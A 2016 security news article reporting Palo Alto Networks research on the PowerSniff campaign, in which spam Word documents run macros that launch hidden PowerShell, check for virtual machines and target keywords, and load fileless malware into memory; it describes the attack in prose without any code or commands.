Malware Combo Packs Punch

Tuesday, March 15, 2016 @ 04:03 PM gHale


There is a new attack approach that combines spam campaigns, malicious Word documents, and PowerShell code to deliver fileless malware – and victims are falling for it.

At face value, none of these techniques is new, but the combination packs a powerful punch.

RELATED STORIES
Asus Must Hike Router Security: FTC
FTC Ruling Puts ICS Firms on Alert
FTC Can Sue for Bad Cyber Security
Complexity Halts Security: Report

It also shows malware developers are paying closer attention to security research and the work of some of their peers, borrowing techniques from each other in their ever-present struggle to evade detection, according to researchers from Palo Alto Networks.

This campaign is small but has the potential to grow, according to the researchers.

Malware operators are using spam emails to deliver infected Word documents to their victims. Despite Word’s macro feature being a hotbed for malware, there are Microsoft Office installations where Word macros are on and will automatically execute when the document opens.

This means in situations where the spam campaign fools users into opening the documents, the malicious macro code will end up executed automatically.

For this campaign, the macro code packed with each malicious document will start a hidden instance of Windows PowerShell, a powerful scripting language added since Windows 7, and then download malicious scripts that will end up executed by the PowerShell instance, said Palo Alto researchers.

Support is for 32-bit and 64-bit platforms, and the scripts first initiate a series of tests. They will check if the computer is not a virtual machine, if there are no software debugging apps running, and it will then look for “trigger” words in the computer’s cache and network configuration.

The string check includes good and bad words. If strings like hospital, school, college, nurse, and doctor end up discovered, the script will immediately stop from execution. If strings related to shops, stores, and PoS systems are on the target, the scripts will proceed to download whatever malware family the C&C servers instruct it to download.

When this happens, the malware, named PowerSniff, ends up written directly to the computer’s memory, without ever touching the user’s hard drive, so it won’t be subject to classic antivirus detection procedures.

At the moment, the spam campaign has mainly targeted users living in the U.S., Canada, the UK, France, Germany, Austria, and Poland.